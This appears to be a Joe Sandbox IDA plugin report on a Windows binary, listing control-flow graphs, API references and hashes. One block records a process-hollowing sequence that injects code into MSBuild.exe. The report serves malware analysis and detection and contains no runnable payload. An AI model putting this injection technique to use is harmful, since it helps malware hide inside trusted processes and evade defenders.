_Ungetc 29 API calls 23111->23112 23113 691b94 23112->23113 23114 69177e 33 API calls 23113->23114 23117 691bde __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23113->23117 23115 691c3b 23114->23115 23116 69177e 33 API calls 23115->23116 23115->23117 23116->23117 23117->23092 23119 6917a8 ___scrt_is_nonwritable_in_current_image 23118->23119 23120 6917eb 23119->23120 23122 691831 23119->23122 23128 691797 23119->23128 23121 687445 _Fputc 29 API calls 23120->23121 23121->23128 23129 692626 EnterCriticalSection 23122->23129 23124 691837 23125 691858 23124->23125 23126 6918c1 _Fputc 31 API calls 23124->23126 23130 6918b9 23125->23130 23126->23125 23128->23088 23128->23090 23128->23092 23129->23124 23133 692649 LeaveCriticalSection 23130->23133 23132 6918bf 23132->23128 23133->23132 23134->23074 18797 6a619e 18804 6a61d4 18797->18804 18798 6a6321 GetPEB 18799 6a6333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 18798->18799 18800 6a63da WriteProcessMemory 18799->18800 18799->18804 18801 6a641f 18800->18801 18802 6a6461 WriteProcessMemory Wow64SetThreadContext ResumeThread 18801->18802 18803 6a6424 WriteProcessMemory 18801->18803 18803->18801 18804->18798 18804->18799 24410 67d39a 24411 67d3d8 24410->24411 24412 67d3a3 24410->24412 24412->24411 24415 6879ba 24412->24415 24414 67d3cb 24416 6879cc 24415->24416 24418 6879d5 ___scrt_uninitialize_crt 24415->24418 24417 687b38 ___scrt_uninitialize_crt 68 API calls 24416->24417 24419 6879d2 24417->24419 24420 6879e4 24418->24420 24423 687cbd 24418->24423 24419->24414 24420->24414 24424 687cc9 ___scrt_is_nonwritable_in_current_image 24423->24424 24431 681d4e EnterCriticalSection 24424->24431 24426 687cd7 24427 687a16 ___scrt_uninitialize_crt 68 API calls 24426->24427 24428 687ce8 24427->24428 24432 687d11 24428->24432 24431->24426 24435 681d62 LeaveCriticalSection 24432->24435 24434 687a0b 24434->24414 24435->24434

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,006A6110,006A6100), ref: 006A6334
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 006A6347
                                                                                  • Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 006A6365
                                                                                  • ReadProcessMemory.KERNELBASE(00000128,?,006A6154,00000004,00000000), ref: 006A6389
                                                                                  • VirtualAllocEx.KERNELBASE(00000128,?,?,00003000,00000040), ref: 006A63B4
                                                                                  • WriteProcessMemory.KERNELBASE(00000128,00000000,?,?,00000000,?), ref: 006A640C
                                                                                  • WriteProcessMemory.KERNELBASE(00000128,00400000,?,?,00000000,?,00000028), ref: 006A6457
                                                                                  • WriteProcessMemory.KERNELBASE(00000128,?,?,00000004,00000000), ref: 006A6495
                                                                                  • Wow64SetThreadContext.KERNEL32(00000088,02E30000), ref: 006A64D1
                                                                                  • ResumeThread.KERNELBASE(00000088), ref: 006A64E0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                  • API String ID: 2687962208-3857624555
                                                                                  • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                  • Instruction ID: b203598555573086846a7c071ad5a5e8c97f4e80a135f5e72123d19b03f802c9
                                                                                  • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                  • Instruction Fuzzy Hash: 0EB1F97660024AAFDB60CF68CC80BDA77A5FF89714F158164EA08AB341D774FE52CB94

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 26 68bd42-68bd4e 27 68bde0-68bde3 26->27 28 68bde9 27->28 29 68bd53-68bd64 27->29 30 68bdeb-68bdef 28->30 31 68bd71-68bd8a LoadLibraryExW 29->31 32 68bd66-68bd69 29->32 35 68bd8c-68bd95 GetLastError 31->35 36 68bdf0-68be00 31->36 33 68be09-68be0b 32->33 34 68bd6f 32->34 33->30 38 68bddd 34->38 39 68bdce-68bddb 35->39 40 68bd97-68bda9 call 68f344 35->40 36->33 37 68be02-68be03 FreeLibrary 36->37 37->33 38->27 39->38 40->39 43 68bdab-68bdbd call 68f344 40->43 43->39 46 68bdbf-68bdcc LoadLibraryExW 43->46 46->36 46->39
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,81500716,?,0068BE51,?,?,00000000), ref: 0068BE03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 3664257935-537541572
                                                                                  • Opcode ID: 603c0cc84a210a6f097dc5fd174ddfd08883448063fda667de7ef9147cb1cdb3
                                                                                  • Instruction ID: e646a8712a590da30cc91d6b0b6a391bd81f95b26dff09217e8e6d5e0ce67648
                                                                                  • Opcode Fuzzy Hash: 603c0cc84a210a6f097dc5fd174ddfd08883448063fda667de7ef9147cb1cdb3
                                                                                  • Instruction Fuzzy Hash: 2221C371A01215BBD721BB64DC41A9A775BEF827A0F252324E916A7391DB70FD01CBD0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID:
                                                                                  • API String ID: 1378416451-0
                                                                                  • Opcode ID: a7d2ccabfb6886754736f5a55c0660e47ba32658b2922710490ede150095e3b1
                                                                                  • Instruction ID: c470a64b974e6e38500708a5f7107ed2a400706748f57c4b8cc4edd14bb299b5
                                                                                  • Opcode Fuzzy Hash: a7d2ccabfb6886754736f5a55c0660e47ba32658b2922710490ede150095e3b1
                                                                                  • Instruction Fuzzy Hash: DC719EB0D04248CFCB50EFA8D59879DBBF1BF49304F10852AE499AB341D774A945CF56

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000002,Ixh,00684BE6,Ixh,00687849,?,00000002,81500716,00687849,00000002), ref: 00684B35
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00684B3C
                                                                                  • ExitProcess.KERNEL32 ref: 00684B4E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID: Ixh
                                                                                  • API String ID: 1703294689-612726217
                                                                                  • Opcode ID: 600c554964d77fd6f620182605787d1fbd778381783550ade5ed3e256374fc60
                                                                                  • Instruction ID: 77c9443c4eb455e198a01cde1163205ae2c4baad4b63aa8bc8777f73c257827a
                                                                                  • Opcode Fuzzy Hash: 600c554964d77fd6f620182605787d1fbd778381783550ade5ed3e256374fc60
                                                                                  • Instruction Fuzzy Hash: 15D05E31044105AFCF103FE0EC0DA487F2BEF813817004114BA054A035CF71E842DF58

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 88 67a4d0-67a536 89 67a571-67a594 call 674420 88->89 90 67a53c-67a54d 88->90 95 67a5ab-67a5c3 89->95 96 67a59a-67a5a6 89->96 92 67a565-67a56b 90->92 93 67a553-67a55f 90->93 92->89 93->92 98 67a61c 95->98 99 67a5c9-67a5d9 95->99 97 67a621-67a762 call 688c30 call 68876d call 688c30 call 6743a0 call 674290 call 6743d0 call 6787f0 call 678890 call 678850 call 6743a0 call 6788b0 call 6743d0 call 6789c0 call 678a10 96->97 131 67a798-67a79f 97->131 132 67a768-67a795 call 67b0e0 call 678890 97->132 98->97 99->98 100 67a5df-67a5f0 99->100 102 67a5f6-67a607 100->102 103 67a60d-67a616 100->103 102->98 102->103 103->98 134 67a8c7-67a8e0 call 671d10 call 6741a0 131->134 135 67a7a5-67a7ae 131->135 132->131 149 67a8e6-67a8f6 call 6741a0 134->149 150 67a8fc-67a906 134->150 137 67a7c5-67a7cb 135->137 138 67a7b4-67a7c0 135->138 141 67a7d1-67a7f1 call 6789f0 137->141 138->141 148 67a7f7-67a80b 141->148 151 67a811-67a826 148->151 152 67a84c-67a854 148->152 149->150 164 67a90b-67a916 call 6741a0 149->164 154 67a91c-67a936 call 674420 150->154 151->152 155 67a82c-67a846 151->155 157 67a85f-67a8a8 call 678a30 152->157 158 67a85a-67a8c2 152->158 166 67a93c-67a946 154->166 167 67aa28-67aa32 154->167 155->152 171 67a8ae-67a8b7 157->171 172 67a8bd 157->172 158->134 164->154 166->167 173 67a94c-67aa23 call 678b40 call 678890 call 678bc0 166->173 168 67ab26-67abac call 678890 call 678bc0 167->168 169 67aa38-67ab21 call 678890 call 678bc0 call 678b40 167->169 187 67abaf 168->187 169->187 171->172 172->148 190 67abb4-67ac2a call 678890 call 678bc0 173->190 187->190 196 67ac2f-67acd5 call 674570 call 678b40 call 671dc0 call 678c50 call 67ba3f 190->196
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcspn
                                                                                  • String ID: @
                                                                                  • API String ID: 3709121408-2766056989
                                                                                  • Opcode ID: 596a681c7787ad2f6befe82ba659bf6b2158ee8e2c66e140c5947ede62ecbe7d
                                                                                  • Instruction ID: 93f04faec5c2f63e732a95fa27cb77a228d448a359a54d376137725be7d45a5e
                                                                                  • Opcode Fuzzy Hash: 596a681c7787ad2f6befe82ba659bf6b2158ee8e2c66e140c5947ede62ecbe7d
                                                                                  • Instruction Fuzzy Hash: 2332B2B4904269CFDB64DF64C981A9DBBF1BF48300F0585AAE84DA7341D734AE85CF52

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleFreeProtectVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 621788221-2766056989
                                                                                  • Opcode ID: 2887ce59871ffe55eee7fc586bbfc662c00d94e9f9e5a327e0f14f38e3d33b0f
                                                                                  • Instruction ID: 4f131c163662e9c713126eaec6b656bbf798067b498550cacc87258486db78af
                                                                                  • Opcode Fuzzy Hash: 2887ce59871ffe55eee7fc586bbfc662c00d94e9f9e5a327e0f14f38e3d33b0f
                                                                                  • Instruction Fuzzy Hash: 7841CEB0D002089FCB44EFA9D98469EBBF1EF49314F10C41AE868AB351D775A984CF95

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 223 68481d-684828 224 68482a-68483d call 686bb1 call 68729c 223->224 225 68483e-684851 call 6848ae 223->225 231 68487f 225->231 232 684853-684870 CreateThread 225->232 233 684881-68488d call 6848fe 231->233 235 68488e-684893 232->235 236 684872-68487e GetLastError call 686bd7 232->236 238 68489a-68489e 235->238 239 684895-684898 235->239 236->231 238->233 239->238
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(?,?,Function_00014935,00000000,?,?), ref: 00684866
                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,0067B58D), ref: 00684872
                                                                                  • __dosmaperr.LIBCMT ref: 00684879
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2744730728-0
                                                                                  • Opcode ID: 84b96c8151572e5668b43d5bbd8b1a15224659867973c3032e3ec25d4d75b4e1
                                                                                  • Instruction ID: 3aff8adfdb20725f4feafeb2858a00d70749215435306a495475d744de47f5bc
                                                                                  • Opcode Fuzzy Hash: 84b96c8151572e5668b43d5bbd8b1a15224659867973c3032e3ec25d4d75b4e1
                                                                                  • Instruction Fuzzy Hash: 7B01B1B2A0025ABFDF15BFA0DC06AEE7B6AEF40360F004258F90196290DF75DE50DB90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 243 6849b3-6849c0 call 68b104 246 684a00-684a03 ExitThread 243->246 247 6849c2-6849ca 243->247 247->246 248 6849cc-6849d0 247->248 249 6849d2 call 68bc52 248->249 250 6849d7-6849dd 248->250 249->250 252 6849ea-6849f0 250->252 253 6849df-6849e1 250->253 252->246 255 6849f2-6849f4 252->255 253->252 254 6849e3-6849e4 CloseHandle 253->254 254->252 255->246 256 6849f6-6849fa FreeLibraryAndExitThread 255->256 256->246
                                                                                  APIs
                                                                                    • Part of subcall function 0068B104: GetLastError.KERNEL32(00000000,?,00686BB6,0068C132,?,?,0068B000,00000001,00000364,?,00000005,000000FF,?,0068495A,006A56B0,0000000C), ref: 0068B108
                                                                                    • Part of subcall function 0068B104: SetLastError.KERNEL32(00000000), ref: 0068B1AA
                                                                                  • CloseHandle.KERNEL32(?,?,?,006848AD,?,?,00684993,00000000), ref: 006849E4
                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,006848AD,?,?,00684993,00000000), ref: 006849FA
                                                                                  • ExitThread.KERNEL32 ref: 00684A03
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 1991824761-0
                                                                                  • Opcode ID: 94e04f1b45f6e95d6ea1aba4be1532566f3b56dbee543e9427d9ff52ae3297cb
                                                                                  • Instruction ID: 7dee2056df96d3b44c276f632184c04767264c67920172ec70cae46e7969e9b2
                                                                                  • Opcode Fuzzy Hash: 94e04f1b45f6e95d6ea1aba4be1532566f3b56dbee543e9427d9ff52ae3297cb
                                                                                  • Instruction Fuzzy Hash: 84F0BE30044202ABCB347B34AC88A9B3B9B7F01320B180714F92ACA6A4EF70EC41CB58

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0067B5BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                  • String ID: M*g
                                                                                  • API String ID: 2134207285-1002372946
                                                                                  • Opcode ID: 46ff799e856364de568455c0e3cb9da67051a3659ce3629fb9fffcda8dc8cb22
                                                                                  • Instruction ID: 4263fee9095a70ee1bf50cdbe2eec8026a02dbe9583a7814a067f85605d60cf2
                                                                                  • Opcode Fuzzy Hash: 46ff799e856364de568455c0e3cb9da67051a3659ce3629fb9fffcda8dc8cb22
                                                                                  • Instruction Fuzzy Hash: C321E7B0904209DFDB44EFA8C4517AEBBF1BF48300F00886DE449AB351EB74AA44CF95

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 274 692d15-692d37 275 692f2a 274->275 276 692d3d-692d3f 274->276 277 692f2c-692f30 275->277 278 692d6b-692d8e 276->278 279 692d41-692d60 call 687445 276->279 280 692d90-692d92 278->280 281 692d94-692d9a 278->281 287 692d63-692d66 279->287 280->281 283 692d9c-692dad 280->283 281->279 281->283 285 692daf-692dbd call 691760 283->285 286 692dc0-692dd0 call 693042 283->286 285->286 292 692e19-692e2b 286->292 293 692dd2-692dd8 286->293 287->277 294 692e2d-692e33 292->294 295 692e82-692ea2 WriteFile 292->295 296 692dda-692ddd 293->296 297 692e01-692e17 call 6930bf 293->297 301 692e6e-692e7b call 6934ee 294->301 302 692e35-692e38 294->302 298 692ead 295->298 299 692ea4-692eaa GetLastError 295->299 303 692de8-692df7 call 693486 296->303 304 692ddf-692de2 296->304 313 692dfa-692dfc 297->313 306 692eb0-692ebb 298->306 299->298 312 692e80 301->312 307 692e5a-692e6c call 6936b2 302->307 308 692e3a-692e3d 302->308 303->313 304->303 309 692ec2-692ec5 304->309 314 692ebd-692ec0 306->314 315 692f25-692f28 306->315 320 692e55-692e58 307->320 316 692ec8-692eca 308->316 317 692e43-692e50 call 6935c9 308->317 309->316 312->320 313->306 314->309 315->277 321 692ef8-692f04 316->321 322 692ecc-692ed1 316->322 317->320 320->313 327 692f0e-692f20 321->327 328 692f06-692f0c 321->328 325 692eea-692ef3 call 686c3d 322->325 326 692ed3-692ee5 322->326 325->287 326->287 327->287 328->275 328->327
                                                                                  APIs
                                                                                    • Part of subcall function 006930BF: GetConsoleOutputCP.KERNEL32(81500716,00000000,00000000,?), ref: 00693122
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,S'h,006824F1,?,S'h), ref: 00692E9A
                                                                                  • GetLastError.KERNEL32(?,00682753,?,?,?,?,?,?,?,?,?,?,?), ref: 00692EA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                  • String ID:
                                                                                  • API String ID: 2915228174-0
                                                                                  • Opcode ID: 317911a6ae18b3d94c5b8df15858b01900cd39e323b99c2da6b9136e1d95d749
                                                                                  • Instruction ID: 46bae9d991a01de5c7cbc61ce1d3e2cfa955117417448f6ed47bfeabb95ac734
                                                                                  • Opcode Fuzzy Hash: 317911a6ae18b3d94c5b8df15858b01900cd39e323b99c2da6b9136e1d95d749
                                                                                  • Instruction Fuzzy Hash: F161A171D0411ABFDF11DFA8D894AEEBBBEAF19704F140149E800A7652D732DA06DBA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 331 6934ee-693543 call 67ece0 334 6935b8-6935c8 call 67ba3f 331->334 335 693545 331->335 336 69354b 335->336 339 693551-693553 336->339 340 69356d-693592 WriteFile 339->340 341 693555-69355a 339->341 344 6935b0-6935b6 GetLastError 340->344 345 693594-69359f 340->345 342 69355c-693562 341->342 343 693563-69356b 341->343 342->343 343->339 343->340 344->334 345->334 346 6935a1-6935ac 345->346 346->336 347 6935ae 346->347 347->334
                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00692E80,?,00682753,?,?,?,00000000), ref: 0069358A
                                                                                  • GetLastError.KERNEL32(?,00692E80,?,00682753,?,?,?,00000000,?,?,?,?,S'h,006824F1,?,S'h), ref: 006935B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastWrite
                                                                                  • String ID:
                                                                                  • API String ID: 442123175-0
                                                                                  • Opcode ID: db5fc87027b1e68f4f67fb2bdc2575542f8bca9e01ec34f82cb8d4a8b1200ee7
                                                                                  • Instruction ID: 79550c85e47a2e68ad8a49123a5b9d65ed6474d079fecf2a1854dee8914f6348
                                                                                  • Opcode Fuzzy Hash: db5fc87027b1e68f4f67fb2bdc2575542f8bca9e01ec34f82cb8d4a8b1200ee7
                                                                                  • Instruction Fuzzy Hash: F9214B35A002299BCF19DF29DC809E9B7BAAB8D305B1540A9E906D7311D630EE468B64

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
